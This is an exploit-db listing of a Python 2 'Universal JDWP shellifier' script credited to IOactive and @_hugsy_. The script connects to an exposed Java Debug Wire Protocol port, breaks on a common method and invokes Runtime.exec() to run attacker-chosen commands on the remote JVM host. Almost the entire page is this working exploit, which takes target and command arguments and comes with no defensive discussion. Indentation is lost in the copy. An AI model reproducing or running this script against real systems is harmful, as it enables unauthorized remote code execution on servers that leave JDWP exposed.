Java Debug Wire Protocol (JDWP) – Remote Code Execution

  • 作者: IOactive
    日期: 2016-12-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46501/
  • #!/usr/bin/python
    ################################################################################
    #
    # Universal JDWP shellifier
    #
    # @_hugsy_
    #
    # And special cheers to @lanjelot
    #
    
    import socket
    import time
    import sys
    import struct
    import urllib
    import argparse
    
    
    
    ################################################################################
    #
    # JDWP protocol variables
    #
    HANDSHAKE = "JDWP-Handshake"
    
    REQUEST_PACKET_TYPE = 0x00
    REPLY_PACKET_TYPE = 0x80
    
    # Command signatures
    VERSION_SIG = (1, 1)
    CLASSESBYSIGNATURE_SIG= (1, 2)
    ALLCLASSES_SIG= (1, 3)
    ALLTHREADS_SIG= (1, 4)
    IDSIZES_SIG = (1, 7)
    CREATESTRING_SIG= (1, 11)
    SUSPENDVM_SIG = (1, 8)
    RESUMEVM_SIG= (1, 9)
    SIGNATURE_SIG = (2, 1)
    FIELDS_SIG= (2, 4)
    METHODS_SIG = (2, 5)
    GETVALUES_SIG = (2, 6)
    CLASSOBJECT_SIG = (2, 11)
    INVOKESTATICMETHOD_SIG= (3, 3)
    REFERENCETYPE_SIG = (9, 1)
    INVOKEMETHOD_SIG= (9, 6)
    STRINGVALUE_SIG = (10, 1)
    THREADNAME_SIG= (11, 1)
    THREADSUSPEND_SIG = (11, 2)
    THREADRESUME_SIG= (11, 3)
    THREADSTATUS_SIG= (11, 4)
    EVENTSET_SIG= (15, 1)
    EVENTCLEAR_SIG= (15, 2)
    EVENTCLEARALL_SIG = (15, 3)
    
    # Other codes
    MODKIND_COUNT = 1
    MODKIND_THREADONLY= 2
    MODKIND_CLASSMATCH= 5
    MODKIND_LOCATIONONLY= 7
    EVENT_BREAKPOINT= 2
    SUSPEND_EVENTTHREAD = 1
    SUSPEND_ALL = 2
    NOT_IMPLEMENTED = 99
    VM_DEAD = 112
    INVOKE_SINGLE_THREADED= 2
    TAG_OBJECT= 76
    TAG_STRING= 115
    TYPE_CLASS= 1
    
    
    ################################################################################
    #
    # JDWP client class
    #
    class JDWPClient:
    
    def __init__(self, host, port=8000):
    self.host = host
    self.port = port
    self.methods = {}
    self.fields = {}
    self.id = 0x01
    return
    
    def create_packet(self, cmdsig, data=""):
    flags = 0x00
    cmdset, cmd = cmdsig
    pktlen = len(data) + 11
    pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd))
    pkt+= data
    self.id += 2
    return pkt
    
    def read_reply(self):
    header = self.socket.recv(11)
    pktlen, id, flags, errcode = struct.unpack(">IIcH", header)
    
    if flags == chr(REPLY_PACKET_TYPE):
    if errcode :
    raise Exception("Received errcode %d" % errcode)
    
    buf = ""
    while len(buf) + 11 < pktlen:
    data = self.socket.recv(1024)
    if len(data):
    buf += data
    else:
    time.sleep(1)
    return buf
    
    def parse_entries(self, buf, formats, explicit=True):
    entries = []
    index = 0
    
    
    if explicit:
    nb_entries = struct.unpack(">I", buf[:4])[0]
    buf = buf[4:]
    else:
    nb_entries = 1
    
    for i in range(nb_entries):
    data = {}
    for fmt, name in formats:
    if fmt == "L" or fmt == 8:
    data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0])
    index += 8
    elif fmt == "I" or fmt == 4:
    data[name] = int(struct.unpack(">I", buf[index:index+4])[0])
    index += 4
    elif fmt == 'S':
    l = struct.unpack(">I", buf[index:index+4])[0]
    data[name] = buf[index+4:index+4+l]
    index += 4+l
    elif fmt == 'C':
    data[name] = ord(struct.unpack(">c", buf[index])[0])
    index += 1
    elif fmt == 'Z':
    t = ord(struct.unpack(">c", buf[index])[0])
    if t == 115:
    s = self.solve_string(buf[index+1:index+9])
    data[name] = s
    index+=9
    elif t == 73:
    data[name] = struct.unpack(">I", buf[index+1:index+5])[0]
    buf = struct.unpack(">I", buf[index+5:index+9])
    index=0
    
    else:
    print "Error"
    sys.exit(1)
    
    entries.append( data )
    
    return entries
    
    def format(self, fmt, value):
    if fmt == "L" or fmt == 8:
    return struct.pack(">Q", value)
    elif fmt == "I" or fmt == 4:
    return struct.pack(">I", value)
    
    raise Exception("Unknown format")
    
    def unformat(self, fmt, value):
    if fmt == "L" or fmt == 8:
    return struct.unpack(">Q", value[:8])[0]
    elif fmt == "I" or fmt == 4:
    return struct.unpack(">I", value[:4])[0]
    else:
    raise Exception("Unknown format")
    return
    
    def start(self):
    self.handshake(self.host, self.port)
    self.idsizes()
    self.getversion()
    self.allclasses()
    return
    
    def handshake(self, host, port):
    s = socket.socket()
    try:
    s.connect( (host, port) )
    except socket.error as msg:
    raise Exception("Failed to connect: %s" % msg)
    
    s.send( HANDSHAKE )
    
    if s.recv( len(HANDSHAKE) ) != HANDSHAKE:
    raise Exception("Failed to handshake")
    else:
    self.socket = s
    
    return
    
    def leave(self):
    self.socket.close()
    return
    
    def getversion(self):
    self.socket.sendall( self.create_packet(VERSION_SIG) )
    buf = self.read_reply()
    formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
    ('S', "vmVersion"), ('S', "vmName"), ]
    for entry in self.parse_entries(buf, formats, False):
    for name,valuein entry.iteritems():
    setattr(self, name, value)
    return
    
    @property
    def version(self):
    return "%s - %s" % (self.vmName, self.vmVersion)
    
    def idsizes(self):
    self.socket.sendall( self.create_packet(IDSIZES_SIG) )
    buf = self.read_reply()
    formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
    ("I", "referenceTypeIDSize"), ("I", "frameIDSize") ]
    for entry in self.parse_entries(buf, formats, False):
    for name,valuein entry.iteritems():
    setattr(self, name, value)
    return
    
    def allthreads(self):
    try:
    getattr(self, "threads")
    except :
    self.socket.sendall( self.create_packet(ALLTHREADS_SIG) )
    buf = self.read_reply()
    formats = [ (self.objectIDSize, "threadId")]
    self.threads = self.parse_entries(buf, formats)
    finally:
    return self.threads
    
    def get_thread_by_name(self, name):
    self.allthreads()
    for t in self.threads:
    threadId = self.format(self.objectIDSize, t["threadId"])
    self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) )
    buf = self.read_reply()
    if len(buf) and name == self.readstring(buf):
    return t
    return None
    
    def allclasses(self):
    try:
    getattr(self, "classes")
    except:
    self.socket.sendall( self.create_packet(ALLCLASSES_SIG) )
    buf = self.read_reply()
    formats = [ ('C', "refTypeTag"),
    (self.referenceTypeIDSize, "refTypeId"),
    ('S', "signature"),
    ('I', "status")]
    self.classes = self.parse_entries(buf, formats)
    
    return self.classes
    
    def get_class_by_name(self, name):
    for entry in self.classes:
    if entry["signature"].lower() == name.lower() :
    return entry
    return None
    
    def get_methods(self, refTypeId):
    if not self.methods.has_key(refTypeId):
    refId = self.format(self.referenceTypeIDSize, refTypeId)
    self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) )
    buf = self.read_reply()
    formats = [ (self.methodIDSize, "methodId"),
    ('S', "name"),
    ('S', "signature"),
    ('I', "modBits")]
    self.methods[refTypeId] = self.parse_entries(buf, formats)
    return self.methods[refTypeId]
    
    def get_method_by_name(self, name):
    for refId in self.methods.keys():
    for entry in self.methods[refId]:
    if entry["name"].lower() == name.lower() :
    return entry
    return None
    
    def getfields(self, refTypeId):
    if not self.fields.has_key( refTypeId ):
    refId = self.format(self.referenceTypeIDSize, refTypeId)
    self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) )
    buf = self.read_reply()
    formats = [ (self.fieldIDSize, "fieldId"),
    ('S', "name"),
    ('S', "signature"),
    ('I', "modbits")]
    self.fields[refTypeId] = self.parse_entries(buf, formats)
    return self.fields[refTypeId]
    
    def getvalue(self, refTypeId, fieldId):
    data = self.format(self.referenceTypeIDSize, refTypeId)
    data+= struct.pack(">I", 1)
    data+= self.format(self.fieldIDSize, fieldId)
    self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) )
    buf = self.read_reply()
    formats = [ ("Z", "value") ]
    field = self.parse_entries(buf, formats)[0]
    return field
    
    def createstring(self, data):
    buf = self.buildstring(data)
    self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) )
    buf = self.read_reply()
    return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)
    
    def buildstring(self, data):
    return struct.pack(">I", len(data)) + data
    
    def readstring(self, data):
    size = struct.unpack(">I", data[:4])[0]
    return data[4:4+size]
    
    def suspendvm(self):
    self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) )
    self.read_reply()
    return
    
    def resumevm(self):
    self.socket.sendall( self.create_packet( RESUMEVM_SIG ) )
    self.read_reply()
    return
    
    def invokestatic(self, classId, threadId, methId, *args):
    data = self.format(self.referenceTypeIDSize, classId)
    data+= self.format(self.objectIDSize, threadId)
    data+= self.format(self.methodIDSize, methId)
    data+= struct.pack(">I", len(args))
    for arg in args:
    data+= arg
    data+= struct.pack(">I", 0)
    
    self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) )
    buf = self.read_reply()
    return buf
    
    def invoke(self, objId, threadId, classId, methId, *args):
    data = self.format(self.objectIDSize, objId)
    data+= self.format(self.objectIDSize, threadId)
    data+= self.format(self.referenceTypeIDSize, classId)
    data+= self.format(self.methodIDSize, methId)
    data+= struct.pack(">I", len(args))
    for arg in args:
    data+= arg
    data+= struct.pack(">I", 0)
    
    self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) )
    buf = self.read_reply()
    return buf
    
    def solve_string(self, objId):
    self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) )
    buf = self.read_reply()
    if len(buf):
    return self.readstring(buf)
    else:
    return ""
    
    def query_thread(self, threadId, kind):
    data = self.format(self.objectIDSize, threadId)
    self.socket.sendall( self.create_packet(kind, data=data) )
    buf = self.read_reply()
    return
    
    def suspend_thread(self, threadId):
    return self.query_thread(threadId, THREADSUSPEND_SIG)
    
    def status_thread(self, threadId):
    return self.query_thread(threadId, THREADSTATUS_SIG)
    
    def resume_thread(self, threadId):
    return self.query_thread(threadId, THREADRESUME_SIG)
    
    def send_event(self, eventCode, *args):
    data = ""
    data+= chr( eventCode )
    data+= chr( SUSPEND_ALL )
    data+= struct.pack(">I", len(args))
    
    for kind, option in args:
    data+= chr( kind )
    data+= option
    
    self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) )
    buf = self.read_reply()
    return struct.unpack(">I", buf)[0]
    
    def clear_event(self, eventCode, rId):
    data = chr(eventCode)
    data+= struct.pack(">I", rId)
    self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) )
    self.read_reply()
    return
    
    def clear_events(self):
    self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) )
    self.read_reply()
    return
    
    def wait_for_event(self):
    buf = self.read_reply()
    return buf
    
    def parse_event_breakpoint(self, buf, eventId):
    num = struct.unpack(">I", buf[2:6])[0]
    rId = struct.unpack(">I", buf[6:10])[0]
    if rId != eventId:
    return None
    tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize])
    loc = -1 # don't care
    return rId, tId, loc
    
    
    
    def runtime_exec(jdwp, args):
    print ("[+] Targeting '%s:%d'" % (args.target, args.port))
    print ("[+] Reading settings for '%s'" % jdwp.version)
    
    # 1. get Runtime class reference
    runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;")
    if runtimeClass is None:
    print ("[-] Cannot find class Runtime")
    return False
    print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"])
    
    # 2. get getRuntime() meth reference
    jdwp.get_methods(runtimeClass["refTypeId"])
    getRuntimeMeth = jdwp.get_method_by_name("getRuntime")
    if getRuntimeMeth is None:
    print ("[-] Cannot find method Runtime.getRuntime()")
    return False
    print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"])
    
    # 3. setup breakpoint on frequently called method
    c = jdwp.get_class_by_name( args.break_on_class )
    if c is None:
    print("[-] Could not access class '%s'" % args.break_on_class)
    print("[-] It is possible that this class is not used by application")
    print("[-] Test with another one with option `--break-on`")
    return False
    
    jdwp.get_methods( c["refTypeId"] )
    m = jdwp.get_method_by_name( args.break_on_method )
    if m is None:
    print("[-] Could not access method '%s'" % args.break_on)
    return False
    
    loc = chr( TYPE_CLASS )
    loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] )
    loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] )
    loc+= struct.pack(">II", 0, 0)
    data = [ (MODKIND_LOCATIONONLY, loc), ]
    rId = jdwp.send_event( EVENT_BREAKPOINT, *data )
    print ("[+] Created break event id=%x" % rId)
    
    # 4. resume vm and wait for event
    jdwp.resumevm()
    
    print ("[+] Waiting for an event on '%s'" % args.break_on)
    while True:
    buf = jdwp.wait_for_event()
    ret = jdwp.parse_event_breakpoint(buf, rId)
    if ret is not None:
    break
    
    rId, tId, loc = ret
    print ("[+] Received matching event from thread %#x" % tId)
    
    jdwp.clear_event(EVENT_BREAKPOINT, rId)
    
    # 5. Now we can execute any code
    if args.cmd:
    runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd)
    else:
    # by default, only prints out few system properties
    runtime_exec_info(jdwp, tId)
    
    jdwp.resumevm()
    
    print ("[!] Command successfully executed")
    
    return True
    
    
    def runtime_exec_info(jdwp, threadId):
    #
    # This function calls java.lang.System.getProperties() and
    # displays OS properties (non-intrusive)
    #
    properties = {"java.version": "Java Runtime Environment version",
    "java.vendor": "Java Runtime Environment vendor",
    "java.vendor.url": "Java vendor URL",
    "java.home": "Java installation directory",
    "java.vm.specification.version": "Java Virtual Machine specification version",
    "java.vm.specification.vendor": "Java Virtual Machine specification vendor",
    "java.vm.specification.name": "Java Virtual Machine specification name",
    "java.vm.version": "Java Virtual Machine implementation version",
    "java.vm.vendor": "Java Virtual Machine implementation vendor",
    "java.vm.name": "Java Virtual Machine implementation name",
    "java.specification.version": "Java Runtime Environment specification version",
    "java.specification.vendor": "Java Runtime Environment specification vendor",
    "java.specification.name": "Java Runtime Environment specification name",
    "java.class.version": "Java class format version number",
    "java.class.path": "Java class path",
    "java.library.path": "List of paths to search when loading libraries",
    "java.io.tmpdir": "Default temp file path",
    "java.compiler": "Name of JIT compiler to use",
    "java.ext.dirs": "Path of extension directory or directories",
    "os.name": "Operating system name",
    "os.arch": "Operating system architecture",
    "os.version": "Operating system version",
    "file.separator": "File separator",
    "path.separator": "Path separator",
    "user.name": "User's account name",
    "user.home": "User's home directory",
    "user.dir": "User's current working directory"
    }
    
    systemClass = jdwp.get_class_by_name("Ljava/lang/System;")
    if systemClass is None:
    print ("[-] Cannot find class java.lang.System")
    return False
    
    jdwp.get_methods(systemClass["refTypeId"])
    getPropertyMeth = jdwp.get_method_by_name("getProperty")
    if getPropertyMeth is None:
    print ("[-] Cannot find method System.getProperty()")
    return False
    
    for propStr, propDesc in properties.iteritems():
    propObjIds =jdwp.createstring(propStr)
    if len(propObjIds) == 0:
    print ("[-] Failed to allocate command")
    return False
    propObjId = propObjIds[0]["objId"]
    
    data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ]
    buf = jdwp.invokestatic(systemClass["refTypeId"],
    threadId,
    getPropertyMeth["methodId"],
    *data)
    if buf[0] != chr(TAG_STRING):
    print ("[-] %s: Unexpected returned type: expecting String" % propStr)
    else:
    retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
    res = cli.solve_string(jdwp.format(jdwp.objectIDSize, retId))
    print ("[+] Found %s '%s'" % (propDesc, res))
    
    return True
    
    
    def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command):
    #
    # This function will invoke command as a payload, which will be running
    # with JVM privilege on host (intrusive).
    #
    print ("[+] Selected payload '%s'" % command)
    
    # 1. allocating string containing our command to exec()
    cmdObjIds = jdwp.createstring( command )
    if len(cmdObjIds) == 0:
    print ("[-] Failed to allocate command")
    return False
    cmdObjId = cmdObjIds[0]["objId"]
    print ("[+] Command string object created id:%x" % cmdObjId)
    
    # 2. use context to get Runtime object
    buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId)
    if buf[0] != chr(TAG_OBJECT):
    print ("[-] Unexpected returned type: expecting Object")
    return False
    rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
    
    if rt is None:
    print "[-] Failed to invoke Runtime.getRuntime()"
    return False
    print ("[+] Runtime.getRuntime() returned context id:%#x" % rt)
    
    # 3. find exec() method
    execMeth = jdwp.get_method_by_name("exec")
    if execMeth is None:
    print ("[-] Cannot find method Runtime.exec()")
    return False
    print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"])
    
    # 4. call exec() in this context with the alloc-ed string
    data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ]
    buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data)
    if buf[0] != chr(TAG_OBJECT):
    print ("[-] Unexpected returned type: expecting Object")
    return False
    
    retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
    print ("[+] Runtime.exec() successful, retId=%x" % retId)
    
    return True
    
    
    def str2fqclass(s):
    i = s.rfind('.')
    if i == -1:
    print("Cannot parse path")
    sys.exit(1)
    
    method = s[i:][1:]
    classname = 'L' + s[:i].replace('.', '/') + ';'
    return classname, method
    
    
    if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
     formatter_class=argparse.ArgumentDefaultsHelpFormatter )
    
    parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
    parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")
    
    parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
    default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
    parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
    help="Specify command to execute remotely")
    
    args = parser.parse_args()
    
    classname, meth = str2fqclass(args.break_on)
    setattr(args, "break_on_class", classname)
    setattr(args, "break_on_method", meth)
    
    retcode = 0
    
    try:
    cli = JDWPClient(args.target, args.port)
    cli.start()
    
    if runtime_exec(cli, args) == False:
    print ("[-] Exploit failed")
    retcode = 1
    
    except KeyboardInterrupt:
    print ("[+] Exiting on user's request")
    
    except Exception as e:
    print ("[-] Exception: %s" % e)
    retcode = 1
    cli = None
    
    finally:
    if cli:
    cli.leave()
    
    sys.exit(retcode)